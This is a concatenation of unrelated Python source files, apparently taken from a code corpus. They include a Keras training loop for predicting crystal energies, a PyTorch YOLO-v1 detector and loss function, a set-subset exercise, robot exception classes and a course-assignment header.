    singleJobOutputStr, a blank spacer, and the 2F plot output from
    single2FPlot for each candidate job.
    """
    # The original accumulated into a str with .append (an AttributeError)
    # and was missing a closing parenthesis; accumulate in a list instead.
    outLines = []
    for singleJobId in jobId:
        outLines.append("Job number: " + str(singleJobId) + "\n")
        outLines.append(singleJobOutputStr(singleJobId))
        outLines.append("")
        outLines.append(single2FPlot(singleJobId))
    return outLines
# Render the reports for the first ten candidates and for the overflow.
# NOTE(review): jobIdTail is only assigned above when len(jobId) > 10, so
# this line raises NameError for ten candidates or fewer -- confirm intent.
jobHeadOut = jobOut( jobId )
jobTailOut = jobOut( jobIdTail )
#------------------------------------------------------------------------------
# End of processSingleJobs.py
#------------------------------------------------------------------------------
| StarcoderdataPython |
1681461 | # Enter your code here. Read input from STDIN. Print output to STDOUT
# For each test case read two integer sets from stdin (each preceded by its
# declared size, which the set constructor makes redundant) and report
# whether the first set is a subset of the second.
cases = int(input())
for _ in range(cases):
    int(input())  # declared size of A -- unused
    A = set(map(int, input().split()))
    int(input())  # declared size of B -- unused
    B = set(map(int, input().split()))
    print("True" if A <= B else "False")
| StarcoderdataPython |
8190473 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 29 12:50:17 2018
@author: Simon
Trains the NN with the parameters:
dropout=0.3
Size of first hidden lauer: 350
One hidden layers
Sigmoid Activation
Using matrix from folder: 03-01-2019 11.04
Using GP matrix shape
No options should be used when calling the script.
"""
import os, sys
# Make the project root importable regardless of where the script lives,
# and normalise the working directory when launched from inside NN/.
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
if os.getcwd()[-2:] == 'NN':
    os.chdir('..')
from createLargerFeatureMatrix import simpleLargeMatrix, no_redundancy_matrix, advanced_large_matrix
import pickle
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras import regularizers
import numpy as np
# Hyper-parameters for the sweep below.  NOTE(review): ``act`` is
# immediately overridden by the inner loop, so this initial value is unused.
drop=0.3
N=350
act="sigmoid"
n_hidden=1
saved_matrix_folder="03-01-2019 11.04"
feature_matrix_shape="group_period_x_group_period"
# Train five repetitions per activation so run-to-run variance can be
# judged; every fitted model and its training history are saved to disk.
for i in range(5):
    for act in ['sigmoid','relu']:
        # Map the configured feature-matrix shape to its loader function.
        matrix_functions={"atomic_number":simpleLargeMatrix, "group_period_2x2":no_redundancy_matrix, "group_period_x_group_period":advanced_large_matrix}
        matrix_function=matrix_functions[feature_matrix_shape]
        path = "Saved matrices/"+saved_matrix_folder+"/sorted_Cutoff25_noSingleElementKrystals/"
        histories_folder='best'
        if histories_folder not in os.listdir("NN/Saved"):
            os.mkdir("NN/Saved/"+histories_folder)
        #Load training data
        featureMatrixFile = "train_featureMatrix.npy"
        atomicSymbolsListFile = "train_pickledAtomicSymbolsList.txt"
        energiesFile = "train_pickledEnergies.txt"
        largeFeatureMatrix = matrix_function(path,featureMatrixFile, atomicSymbolsListFile)
        with open(path+energiesFile, "rb") as pickleFile:
            energies = pickle.load(pickleFile)
        print(largeFeatureMatrix.shape)
        # Flatten every sample to a 1-D feature vector.
        largeFeatureMatrix.shape = (largeFeatureMatrix.shape[0], -1)
        X = largeFeatureMatrix
        Y = np.array(energies)
        #Load validation set
        featureMatrixFileValidate = "validate_featureMatrix.npy"
        atomicSymbolsListFileValidate = "validate_pickledAtomicSymbolsList.txt"
        energiesFileValidate = "validate_pickledEnergies.txt"
        largeFeatureMatrixValidate = matrix_function(path,featureMatrixFileValidate, atomicSymbolsListFileValidate)
        with open(path+energiesFileValidate, "rb") as pickleFile:
            energiesValidate = pickle.load(pickleFile)
        largeFeatureMatrixValidate.shape = (largeFeatureMatrixValidate.shape[0], -1)
        X_v = largeFeatureMatrixValidate
        Y_v = np.array(energiesValidate)
        #Load test set
        featureMatrixFileTest = "test_featureMatrix.npy"
        atomicSymbolsListFileTest = "test_pickledAtomicSymbolsList.txt"
        energiesFileTest = "test_pickledEnergies.txt"
        largeFeatureMatrixTest = matrix_function(path,featureMatrixFileTest, atomicSymbolsListFileTest)
        with open(path+energiesFileTest, "rb") as pickleFile:
            energiesTest = pickle.load(pickleFile)
        largeFeatureMatrixTest.shape = (largeFeatureMatrixTest.shape[0], -1)
        X_t = largeFeatureMatrixTest
        Y_t = np.array(energiesTest)
        #Model
        model = Sequential()
        inputShape = np.shape(X)[1:]
        #First hidden layer after input
        model.add(Dropout(drop, input_shape=inputShape))
        model.add(Dense(N, activation=act))
        #Addition hidden layers after input
        # Each extra hidden layer halves the width of the previous one.
        for n in range(n_hidden-1):
            model.add(Dropout(drop))
            model.add(Dense(N//(2**(n+1)), activation=act))
        #Output layer
        model.add(Dropout(drop))
        model.add(Dense(1))
        #Compile model
        model.compile(loss='mse', optimizer='adam', metrics=["mse"])
        print(model.summary())
        #Fit the model. This is where the hard computing happens.
        #Number of epochs is number of iterations through dataset
        #Batch size is number of iterations before weights are changed.
        history=model.fit(X, Y, epochs=70, batch_size=50, validation_data=(X_v,Y_v))
        # Find the first unused history/model index for this activation so
        # repeated runs never overwrite previous results.
        best_saved=os.listdir("NN/Saved/"+histories_folder)
        file_num=1
        num_found=False
        while num_found == False:
            if f"history{file_num}{act}" in best_saved:
                file_num+=1
            else:
                num_found = True
        with open(f"NN/Saved/"+histories_folder+f"/history"+str(file_num)+act, 'wb') as file:
            pickle.dump(history.history, file)
        # with open(f"NN/Saved/"+histories_folder+f"/model"+str(file_num), 'wb') as file:
        #     pickle.dump(model, file)
        model.save(f"NN/Saved/"+histories_folder+f"/model"+str(file_num)+act+'.h5')
        #Evaluate model efficiency
        #scores = model.evaluate(X, Y)
        #print("\n%s: %.2f eV" % (model.metrics_names[1], scores[1]))
        #Make predictions on training set
        predictions = model.predict(X)
        a=0
        for i in range(len(predictions)):
            a+=(energies[i]-predictions[i])**2
        rmse=np.sqrt(a/len(energies))
        print("RMSE on training data "+str(rmse))
        #Make predictions on validation set
        predictions_validate = model.predict(X_v)
        a=0
        for i in range(len(predictions_validate)):
            a+=(energiesValidate[i]-predictions_validate[i])**2
        rmseValidate=np.sqrt(a/len(energiesValidate))
        print("RMSE on validation data "+str(rmseValidate))
        #Make predictions on test set
        predictions_test = model.predict(X_t)
        a=0
        for i in range(len(predictions_test)):
            a+=(energiesTest[i]-predictions_test[i])**2
        rmseTest=np.sqrt(a/len(energiesTest))
        print("RMSE on test data "+str(rmseTest))
        # Append a summary of this run to the shared results file; the
        # header block (first_outs) is written only on first creation.
        first_outs=["Activation = "+act,"Drop = " + str(drop),"N = " + str(N), "Number of hidden layers (width halves with every layer) = " + str(n_hidden), "Saved matrix folder = "+saved_matrix_folder,"Matrix shape = "+feature_matrix_shape]
        outs = ["Activation: "+act, "Model number= = "+str(file_num),"RMSE on training data= "+str(rmse),"RMSE on validation data= "+str(rmseValidate),"RMSE on test data= "+str(rmseTest)]
        outfile="NN/Saved/best/best_outputs.txt"
        with open(outfile, "a+") as file:
            if "best_outputs.txt" not in best_saved:
                for line in first_outs[1:]:
                    file.write(line)
                    file.write("\n")
            for line in outs:
                file.write(line)
                file.write("\n")
            file.write("\n")
        print("DONE")
| StarcoderdataPython |
236901 | <reponame>zoubohao/YOLO-V1-Pytorch
from abc import ABC
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import cv2
class Mish(nn.Module):
    """Mish activation: ``x * tanh(softplus(x))``."""

    def __init__(self):
        super(Mish, self).__init__()

    def forward(self, x):
        # softplus keeps the tanh argument smooth and positive.
        gate = torch.tanh(F.softplus(x))
        return x * gate
class Conv2dDynamicSamePadding(nn.Module):
    """
    The real keras/tensorflow conv2d with same padding

    Pads the input at forward time (depending on its actual H/W) so the
    output spatial size equals ``ceil(input / stride)``, exactly like
    TensorFlow's ``padding='SAME'``.
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride = 1, groups=1, bias=True):
        super().__init__()
        self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride,
                              bias=bias, groups=groups)
        self.stride = self.conv.stride
        self.kernel_size = self.conv.kernel_size
        # NOTE(review): self.dilation is stored but never used in the
        # padding computation below -- padding is only correct for
        # dilation == 1 (the constructor cannot set any other value).
        self.dilation = self.conv.dilation
        # Normalise stride/kernel_size to two-element [h, w] lists.
        if isinstance(self.stride, int):
            self.stride = [self.stride] * 2
        elif len(self.stride) == 1:
            self.stride = [self.stride[0]] * 2
        if isinstance(self.kernel_size, int):
            self.kernel_size = [self.kernel_size] * 2
        elif len(self.kernel_size) == 1:
            self.kernel_size = [self.kernel_size[0]] * 2

    def forward(self, x):
        h, w = x.shape[-2:]
        # Number of output positions along each axis (ceil division).
        h_step = math.ceil(w / self.stride[1])
        v_step = math.ceil(h / self.stride[0])
        # Total input extent the kernel must cover to produce those outputs.
        h_cover_len = self.stride[1] * (h_step - 1) + 1 + (self.kernel_size[1] - 1)
        v_cover_len = self.stride[0] * (v_step - 1) + 1 + (self.kernel_size[0] - 1)
        # Extra pixels needed, split as evenly as possible (right/bottom get
        # the odd pixel, matching TensorFlow's convention).
        extra_h = h_cover_len - w
        extra_v = v_cover_len - h
        left = extra_h // 2
        right = extra_h - left
        top = extra_v // 2
        bottom = extra_v - top
        x = F.pad(x, [left, right, top, bottom])
        x = self.conv(x)
        return x
class SeparableConvBlock(nn.Module):
    """Depthwise-separable 3x3 convolution with optional BN and Mish.

    Only the pointwise convolution carries a bias, following the usual
    depthwise-separable convention (the depthwise stage is bias-free).
    """

    def __init__(self, in_channels, out_channels=None, norm=True, activation=False):
        super(SeparableConvBlock, self).__init__()
        out_channels = in_channels if out_channels is None else out_channels
        # Depthwise 3x3 (one filter per channel), then 1x1 pointwise mix.
        self.depthwise_conv = Conv2dDynamicSamePadding(
            in_channels, in_channels, kernel_size=3, stride=1,
            groups=in_channels, bias=False)
        self.pointwise_conv = Conv2dDynamicSamePadding(
            in_channels, out_channels, kernel_size=1, stride=1)
        self.norm = norm
        if self.norm:
            self.bn = nn.BatchNorm2d(out_channels)
        self.activation = activation
        if self.activation:
            self.relu = Mish()

    def forward(self, x):
        out = self.pointwise_conv(self.depthwise_conv(x))
        if self.norm:
            out = self.bn(out)
        return self.relu(out) if self.activation else out
class Bottleneck(nn.Module):
    """Residual bottleneck: 1x1 -> depthwise 3x3 (strided) -> 1x1.

    The shortcut is always a projected path (strided 3x3 conv + BN + Mish),
    so input and output shapes match even when channels or stride change.
    """

    def __init__(self, inChannels, outChannels, stride=1):
        super(Bottleneck, self).__init__()
        self.conv1 = nn.Conv2d(inChannels, outChannels, kernel_size=1)
        self.bn1 = nn.BatchNorm2d(outChannels, eps=1e-3, momentum=1 - 0.99)
        self.conv2 = nn.Conv2d(outChannels, outChannels, kernel_size=3,
                               stride=stride, groups=outChannels, padding=1)
        self.bn2 = nn.BatchNorm2d(outChannels, eps=1e-3, momentum=1 - 0.99)
        self.conv3 = nn.Conv2d(outChannels, outChannels, kernel_size=1)
        self.bn3 = nn.BatchNorm2d(outChannels)
        self.relu = Mish()
        # Projection shortcut matching channel count and spatial stride.
        self.downSample = nn.Sequential(
            nn.Conv2d(inChannels, outChannels, kernel_size=3, stride=stride, padding=1),
            nn.BatchNorm2d(outChannels, eps=1e-3, momentum=1 - 0.99),
            Mish())

    def forward(self, x):
        shortcut = self.downSample(x)
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.relu(self.bn2(self.conv2(y)))
        y = self.bn3(self.conv3(y))
        return self.relu(y + shortcut)
import math
class YoloDetection(nn.Module, ABC):

    def __init__(self, backBoneOutChannels: int, backbone: nn.Module, BoundingBoxes: int,
                 num_classes: int, SGrid: int, imageSize : int):
        """
        x, y means the center of the bounding box.
        w, h means the width and height of bounding box.
        x1, y1 means the left top coordinate of bounding box.
        x2, y2 means the right bottom coordinate of bounding box.
        (S x S): Our system divides the input image into an S × S grid. If the center of an object falls into a grid cell,
        that grid cell is responsible for detecting that object.
        (x,y): The (x, y) coordinates represent the center of the box relative to the bounds of the grid cell.
        (w,h): The width and height are predicted relative to the whole image.
        (Confidence): Finally the confidence prediction represents the IOU between the predicted box and any ground truth box.
        It is zero if there is no object in this grid.
        :param backBoneOutChannels: the out channels of backbone
        :param backbone: At least 5 times striding 2 operation.
        :param BoundingBoxes: the number of bounding boxes in one cell
        :param num_classes: the number of classes which we would like to detect
        :param SGrid: the number of grid which we would like to split
        """
        super().__init__()
        #print(imageSize // 64)
        #print(SGrid)
        # Number of extra stride-2 stages needed so the feature map reaches
        # exactly S x S, given the backbone already strides by 32 (2^5).
        stridesTimes = math.log2(imageSize / SGrid)
        assert (stridesTimes % np.floor(stridesTimes)) == 0, "The size of image must divide by SGrid !"
        assert imageSize // SGrid >= 32, "The size of image must 32 times bigger than SGrid !"
        self.backbone = backbone
        self.B = BoundingBoxes
        self.S = SGrid
        self.nc = num_classes
        layers = []
        stridesTimes = int(stridesTimes - 5)
        # NOTE(review): both branches append the identical first Bottleneck;
        # the if/else could be collapsed -- confirm no other difference was
        # intended.
        if stridesTimes == 1:
            layers.append(Bottleneck(backBoneOutChannels,outChannels=2048, stride=2))
        else:
            layers.append(Bottleneck(backBoneOutChannels,outChannels=2048, stride=2))
            for _ in range(stridesTimes - 1):
                layers.append(Bottleneck(2048,outChannels=2048, stride=2))
        self.complete = nn.Sequential(*layers)
        self.conv_2 = nn.Sequential(
            SeparableConvBlock(2048, out_channels=2048, norm=True, activation=False),
            Mish(),
            SeparableConvBlock(2048, 2048, norm=True, activation=False),
            Mish()
        )
        # 1x1 head producing B*5 box/confidence channels + class channels.
        self.conv_1 = nn.Sequential(
            nn.Conv2d(2048, self.B * 5 + self.nc, kernel_size=1, stride=1, bias=False),
            nn.BatchNorm2d(self.B * 5 + self.nc, eps=1e-3, momentum=1-0.99),
        )

    def forward(self, x):
        """
        :param x: input image batch, [N, C, H, W]
        :return: confidence [N, S, S, B], boxes [N, S, S, B * 4], condClasses [N, S, S, NUM_CLASSES]
        """
        imgFeature = self.backbone(x)
        imgFeature = self.conv_1(self.conv_2(self.complete(imgFeature)))
        #print(imgFeature.shape)
        # Move channels last so each grid cell's predictions are contiguous.
        finalOutput = imgFeature.permute(0,2,3,1)
        ### B boxes and condClass
        boxesAndConfidence, condClasses = torch.split(finalOutput, [self.B * 5, self.nc], dim=-1)
        boxes, confidence = torch.split(boxesAndConfidence, [self.B * 4, self.B], dim=-1)
        # All outputs are squashed to (0, 1) by sigmoid.
        return torch.sigmoid(confidence), torch.sigmoid(boxes), torch.sigmoid(condClasses)
def compute_iou(box1, box2):
    """Elementwise intersection-over-union of two box tensors.

    Boxes are ``[x1, y1, x2, y2]``.  The tensors must broadcast against
    each other along the leading dimension (e.g. ``[N, 4]`` vs ``[1, 4]``);
    the result has the broadcast shape without the last axis.  A small
    epsilon in the denominator guards against division by zero for
    degenerate boxes.
    """
    top_left = torch.max(box1[:, :2], box2[:, :2])
    bottom_right = torch.min(box1[:, 2:], box2[:, 2:])
    # Negative extents mean the boxes do not overlap at all.
    extent = (bottom_right - top_left).clamp(min=0)
    inter = extent[:, 0] * extent[:, 1]
    area1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1])
    area2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1])
    return inter / (area1 + area2 - inter + 1e-4)
class YoloLoss(nn.Module, ABC):
    """YOLO-v1 style loss: coordinate, object/no-object confidence and
    class terms, computed over an S x S grid with B boxes per cell."""

    def __init__(self, coOrd, noObj,BoundingBoxes: int,
                 num_classes: int, SGrid: int, imageSize = 448, device = "cpu"):
        """
        :param coOrd: weight of the coordinate (x, y, w, h) loss term
        :param noObj: weight of the no-object confidence loss term
        :param BoundingBoxes: boxes predicted per grid cell (B)
        :param num_classes: number of object classes
        :param SGrid: grid size S (image is split into S x S cells)
        :param imageSize: input image side length in pixels
        :param device: torch device string for internal buffers
        """
        super().__init__()
        self.coOrd = coOrd
        self.noObj = noObj
        self.B = BoundingBoxes
        self.S = SGrid
        self.nc = num_classes
        self.imageSize = imageSize
        # Pixel width/height of a single grid cell.
        self.oneGridDis = imageSize // SGrid
        # Pre-computed pixel coordinates of each cell's top-left corner.
        self.leftTopPositions = np.zeros(shape=[SGrid, SGrid, 2])
        for i in range(SGrid):
            for j in range(SGrid):
                self.leftTopPositions[i,j,:] = imageSize // SGrid * j , imageSize // SGrid * i ## x, y
        self.leftTopPositions = torch.from_numpy(self.leftTopPositions).float().to(device)
        self.device = device

    def TransformPredictedBoxes(self, preBoxes):
        """
        Transform yolo coordinate to left, top, right, bottom format.
        :param preBoxes: [N, S, S, BOXES * 4], (x, y, w, h)
        :return: oriBoxes [N, S * S * Boxes, 4] (x1, y1, x2, y2)
        """
        with torch.no_grad():
            ### [N, S, S, B, 4]
            expandDim = torch.reshape(preBoxes, [-1, self.S, self.S, self.B, 4])
            ### [N, S, S, B, 2]
            xy, wh = torch.split(expandDim, [2, 2], dim=-1)
            currentLTP = torch.unsqueeze(self.leftTopPositions, dim=-2).unsqueeze(dim=0) ## [1, S, S, 1, 2]
            # xy is relative to its cell; scale to pixels, then offset by
            # the cell's top-left corner to get absolute centers.
            xy = xy * self.oneGridDis
            # print(xy.device)
            # print(currentLTP.device)
            centerXY = xy + currentLTP
            ### [N, S, S, B, 2]
            # wh is relative to the whole image.
            oriWH = wh * self.imageSize
            centerXY = torch.reshape(centerXY, [-1,self.S * self.S * self.B, 2])
            oriWH = torch.reshape(oriWH, [-1,self.S * self.S * self.B, 2])
            x = centerXY[:,:,0]
            y = centerXY[:,:,1]
            w = oriWH[:,:,0]
            h = oriWH[:,:,1]
            # Clamp corners inside the image.
            x1 = torch.clamp(x - w / 2.,min=0, max=self.imageSize - 1)
            y1 = torch.clamp(y - h / 2.,min=0, max=self.imageSize - 1)
            x2 = torch.clamp(x + w / 2.,min=0, max=self.imageSize - 1)
            y2 = torch.clamp(y + h / 2.,min=0, max=self.imageSize - 1)
            return torch.stack([x1, y1, x2, y2],dim=-1) #, centerXY

    def TransformGroundTruth(self, gtOrdinate):
        """
        Transform yolo coordinate to left, top, right, bottom format.
        :param gtOrdinate: [N, S, S, 4], (x, y, w, h)
        :return: oriBoxes [N, S * S, 4] (x1, y1, x2, y2)
        """
        with torch.no_grad():
            #print(gtOrdinate.device)
            xy, wh = torch.split(gtOrdinate, [2, 2], dim=-1)
            currentLTP = torch.unsqueeze(self.leftTopPositions, dim=-2).unsqueeze(dim=0) ## [1, S, S, 1, 2]
            xy = torch.reshape(xy, [-1, self.S, self.S, 1, 2]) * self.oneGridDis
            centerXY = xy + currentLTP
            oriWH = wh * self.imageSize
            centerXY = torch.reshape(centerXY, [-1,self.S * self.S, 2])
            oriWH = torch.reshape(oriWH, [-1,self.S * self.S, 2])
            x = centerXY[:,:,0]
            y = centerXY[:,:,1]
            w = oriWH[:,:,0]
            h = oriWH[:,:,1]
            x1 = torch.clamp(x - w / 2.,min=0, max=self.imageSize - 1)
            y1 = torch.clamp(y - h / 2.,min=0, max=self.imageSize - 1)
            x2 = torch.clamp(x + w / 2.,min=0, max=self.imageSize - 1)
            y2 = torch.clamp(y + h / 2.,min=0, max=self.imageSize - 1)
            return torch.stack([x1, y1, x2, y2],dim=-1) #, centerXY

    def objMaskAndEncoder(self, groundTruth, groundLabels):
        """
        In gtOrdinate, if one cell contains object, this cell will contain (x, y, w, h).
        However, if there is no object in the cell, it only contains zeros (0, 0, 0, 0).
        :param groundTruth: [N, GTs, 4], (x1, y1, x2, y2)
        :param groundLabels: [N, GTs]
        :return: objMask : [N, S, S], gtOrdinate [N, S, S, 4]; (x, y, w, h), gtLabels [N, S, S, NUM_CLASSES]
        """
        with torch.no_grad():
            bNum = groundTruth.shape[0]
            gtsNum = groundTruth.shape[1]
            x1, y1, x2, y2 = torch.split(groundTruth, [1, 1, 1, 1], dim=-1)
            ### center
            w = x2 - x1
            h = y2 - y1
            ### [N, GTs, 1]
            x = x1 + w / 2.
            y = y1 + h / 2.
            ### judge center in which cell
            ### [N, GTs ,1]
            cellX = torch.floor(x / self.oneGridDis).long()
            cellY = torch.floor(y / self.oneGridDis).long()
            # Encode the center relative to its cell and the size relative
            # to the whole image (YOLO-v1 parameterisation).
            offsetX = (x - cellX * self.oneGridDis) / self.oneGridDis
            offsetY = (y - cellY * self.oneGridDis) / self.oneGridDis
            offsetW = torch.true_divide(w , self.imageSize)
            offsetH = torch.true_divide(h, self.imageSize)
            ### cat [N, GTs, 4]
            offset = torch.cat([offsetX, offsetY, offsetW, offsetH], dim=-1).float()
            gtOrdinate = torch.zeros([bNum, self.S, self.S, 4]).float().to(self.device)
            gtLabels = torch.zeros([bNum, self.S, self.S, self.nc]).to(self.device)
            # Scatter every ground-truth box into the cell that holds its
            # center; a later box landing in the same cell overwrites it.
            for i in range(bNum):
                for j in range(gtsNum):
                    gtOrdinate[i, cellY[i, j, 0], cellX[i, j, 0], :] = offset[i, j, :]
                    gtLabels[i, cellY[i, j, 0], cellX[i, j, 0], groundLabels[i, j]] = 1
            # A cell is "responsible" iff it received at least one label.
            objMask = (gtLabels.sum(dim=-1, keepdim=False) != 0)
            objMask = objMask.float()
        return objMask, gtOrdinate, gtLabels

    def bestIouFind(self, objMask, gtOrdinate, preBoxes):
        """
        For every responsible cell, pick the predicted box with the highest
        IOU against that cell's ground truth.
        :param objMask: objMask : [N, S, S],
        :param gtOrdinate: gtOrdinate [N, S, S, 4] (x, y, w, h)
        :param preBoxes: [N, S, S, BOXES * 4], (x, y, w, h)
        :return: boxObjMask [N, S, S, BOXES], boxIouMaxValue [N, S, S, BOXES]
        """
        bNum = preBoxes.shape[0]
        with torch.no_grad():
            boxObjMask = torch.zeros([bNum, self.S, self.S, self.B]).float().to(self.device)
            boxIouMaxValue = torch.zeros([bNum, self.S, self.S, self.B]).float().to(self.device)
            ## oriBoxes [N, S * S * Boxes * 4] (x1, y1, x2, y2)
            originalBoxes = self.TransformPredictedBoxes(preBoxes).view([-1, self.S, self.S, self.B, 4])
            ## oriGts [N, S * S, 4] (x1, y1, x2, y2)
            originalGts = self.TransformGroundTruth(gtOrdinate).view([-1, self.S, self.S, 4])
            for b in range(bNum):
                for i in range(self.S):
                    for j in range(self.S):
                        if objMask[b, i, j] != 0:
                            currentBoxes = originalBoxes[b, i, j, : , :]
                            #print("current predict boxes {}".format(currentBoxes))
                            currentGts = originalGts[b, i, j, :].unsqueeze(dim=0)
                            #print("gts {}".format(currentGts))
                            ## [b,4] , [1,4] --> [b,1]
                            iouCom = compute_iou(currentBoxes, currentGts).squeeze()
                            #print(iouCom)
                            iouMaxValue, iouMaxIndex = torch.max(iouCom,dim=0)
                            #print("IOU max value {}".format(iouMaxValue))
                            iouMaxIndex = iouMaxIndex.long()
                            boxObjMask[b, i, j, iouMaxIndex] = 1
                            boxIouMaxValue[b, i, j, iouMaxIndex] = iouMaxValue
        return boxObjMask, boxIouMaxValue

    def forward(self,preConfidence, preBoxes, preCondClasses,
                groundTruth, groundLabels):
        """
        :param preConfidence: [N, S, S, BOXES]
        :param preBoxes: [N, S, S, BOXES * 4], (x, y, w, h)
        :param preCondClasses: [N, S, S, NUM_CLASSES]
        :param groundTruth: [N, GTs, 4], (x1, y1, x2, y2)
        :param groundLabels: [N, GTs]
        :return LOSS
        """
        # Target construction is non-differentiable bookkeeping.
        with torch.no_grad():
            ### objMask : [N, S, S], gtOrdinate [N, S, S, 4] (x, y, w, h), gtLabels [N, S, S, NUM_CLASSES]
            objectMask, gtOrdinate, gtLabels = self.objMaskAndEncoder(groundTruth, groundLabels)
            #print(objectMask)
            #print(groundLabels.shape)
            ### boxObjMask [N, S, S, BOXES], boxIouMaxValue [N, S, S, BOXES]
            boxObjMask, boxIouMaxValue = self.bestIouFind(objectMask, gtOrdinate, preBoxes)
            #print(boxObjMask)
        #######################
        ### coordinate loss ###
        #######################
        ### [N, S, S, B, 4]
        expandPreBoxes = torch.reshape(preBoxes, [-1, self.S, self.S, self.B, 4])
        ### [N, S, S, B, 1]
        boxObjMaskExpand = torch.unsqueeze(boxObjMask,dim=-1)
        ### [N, S, S, B, 2]
        xy, wh = torch.split(expandPreBoxes, [2,2], dim=-1)
        # Square roots of w/h, per the YOLO-v1 paper, so small boxes weigh
        # as much as large ones.
        wh = torch.sqrt(wh)
        ### [N, S, S, 2] --> [N, S, S, 1, 2]
        xyGt, whGt = torch.split(gtOrdinate, [2,2], dim=-1)
        whGt = torch.sqrt(whGt)
        xyGt = torch.unsqueeze(xyGt, dim=-2)
        whGt = torch.unsqueeze(whGt, dim=-2)
        ### [N, S, S, B, 2]
        # print("predict xy {}".format(xy * boxObjMaskExpand))
        # print("GT xy {}".format(xyGt))
        xyLoss = (torch.square(xy - xyGt) * boxObjMaskExpand).sum()
        whLoss = (torch.square(wh - whGt) * boxObjMaskExpand).sum()
        coordinateLoss = (xyLoss + whLoss) * self.coOrd
        #print("coordinate loss {}".format(coordinateLoss))
        #######################
        ### confidence loss ###
        #######################
        noBoxObjMask = 1. - boxObjMask
        # print("Box obj mask {}".format(boxObjMask))
        # print("Non box obj mask {}".format(noBoxObjMask))
        objLoss = (torch.square(preConfidence - boxObjMask) * boxObjMask).sum()
        noObjLoss = self.noObj * (torch.square(preConfidence - boxObjMask) * noBoxObjMask).sum()
        #print("confidence loss {}".format(confidenceLoss))
        ##############################
        ### condition classes loss ###
        ##############################
        classesLoss = (torch.square(preCondClasses - gtLabels).sum(dim=-1, keepdim=False) * objectMask).sum()
        #print("classes loss {}".format(classesLoss))
        return coordinateLoss , objLoss, noObjLoss , classesLoss
# drawBox([[x, y, xmax, ymax]], img)
def drawBox(boxes, image):
    """Draw every box on *image* in blue and display until a key is pressed.

    :param boxes: np array, [N, 4], (x1, y1, x2, y2)
    :param image: np array
    """
    for x1, y1, x2, y2 in boxes:
        # changed color and width to make it visible
        cv2.rectangle(image, (x1, y1), (x2, y2), (255, 0, 0), 1)
    cv2.imshow("img", image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
if __name__ == "__main__":
    # Manual smoke test: encode three ground-truth boxes on a 7x7 grid,
    # visualise the decoded cells, then run the full loss end to end.
    testLoss = YoloLoss(1,1, BoundingBoxes=3, num_classes=1, SGrid= 7, imageSize=448)
    testWhiteImg = np.ones([448,448,3]) * 255
    testGts = torch.from_numpy(np.array([[[0, 0, 50, 122], [50, 122, 100, 278], [100, 278, 200, 445]]]))
    testGtLabels = torch.from_numpy(np.array([[0,0,0]]))
    testObjMask, testGtOri, testGtLabels = testLoss.objMaskAndEncoder(testGts,testGtLabels)
    print(testObjMask.shape)
    print(testObjMask)
    print(testGtOri.shape)
    print(testGtOri)
    print(testGtLabels.shape)
    print(testGtLabels)
    # Decode the grid targets back to pixel boxes and draw them.
    drawBoxes = testLoss.TransformGroundTruth(testGtOri).view([7 * 7, 4]).numpy()
    print(drawBoxes.shape)
    drawBox(drawBoxes,testWhiteImg)
    ### test predict
    testInput = torch.rand([1, 7, 7, 3 * 4])
    ### test best iou function
    testObjBoxesMask, testObjIou = testLoss.bestIouFind(testObjMask, testGtOri, testInput)
    print(testObjBoxesMask)
    print(testObjIou)
    ### test mse loss
    mesTestInput = torch.rand([5,5,1])
    mestTestTarget = torch.rand([5,5,5])
    print(F.mse_loss(mesTestInput, mestTestTarget))
    ########
    testInputImage = torch.rand([1, 3, 14, 14]).float()
    testGts = torch.from_numpy(np.array([[[0, 0, 50, 122], [50, 122, 100, 278], [100, 278, 200, 445]]]))
    testGtLabels = torch.from_numpy(np.array([[0,0,0]]))
    # Minimal stand-in backbone: a single conv producing 1024 channels.
    testBackBone = nn.Conv2d(3, 1024, 3, 1, 1)
    testYoloDet = YoloDetection(backbone=testBackBone, backBoneOutChannels=1024, BoundingBoxes=3, num_classes=1, SGrid=7, imageSize=448)
    testYoloLoss = YoloLoss(coOrd=5, noObj=0.2, BoundingBoxes=3, num_classes=1, SGrid=7, imageSize=448)
    testConfi, testBoxes, testCondi = testYoloDet(testInputImage)
    print(testConfi.shape)
    print(testBoxes.shape)
    print(testCondi.shape)
    ## preConfidence, preBoxes, preCondClasses, groundTruth, groundLabels
    loss = testYoloLoss(preConfidence = testConfi, preBoxes = testBoxes, preCondClasses = testCondi,
                        groundTruth = testGts, groundLabels = testGtLabels)
    print(loss)
| StarcoderdataPython |
9710687 | from iBott.robot_activities import RobotException, get_instances
import iRobot.robot as robot
import iRobot.settings as settings
class BusinessException(RobotException):
    """Manage Exceptions Caused by business errors.

    Captures the current robot instance, forwards the action to the base
    RobotException, and immediately processes the exception.
    """

    def __init__(self, message=None, action=None, element=None):
        self.robotClass = get_instances(robot.Main)
        super().__init__(self.robotClass, action)
        self.action = action
        self.element = element
        self.message = message
        self.processException()

    def processException(self):
        """Write action when a Business exception occurs."""
        # Fixed: the original used `is "next"`, comparing string identity
        # (which only works by accident of interning and is a
        # SyntaxWarning on Python 3.8+); equality is what is meant here.
        if self.action == "next":
            self.element.setItemAsFail()
class SystemException(RobotException):
    """Manage Exceptions Caused by system errors.

    Logs the failure via the robot's logger and records how many retries
    are allowed (taken from settings.RETRY_TIMES).
    """

    def __init__(self, message, action):
        # Resolve the running robot instance and hand it to the base class.
        super().__init__(get_instances(robot.Main), action)
        self.retry_times = settings.RETRY_TIMES
        self.action = action
        self.message = message
        self.processException()

    def processException(self):
        """Write action when a system exception occurs."""
        # self.Log is provided by the RobotException base class.
        self.Log.systemException(self.message)
| StarcoderdataPython |
6676447 | <reponame>deredsonjr/testerepository
#-----------------------------------------------
#Introdução a Programação dos Computadores - IPC
#Universidade do Estado do Amazonas - UEA
#Prof. Jucimar Jr.
#<NAME> -|- 1715310011
#<NAME> -|- 1715310026
#<NAME> do nascimento -|- 1515200550
#<NAME> -|- 1715310063
#<NAME> -|- 1515070169
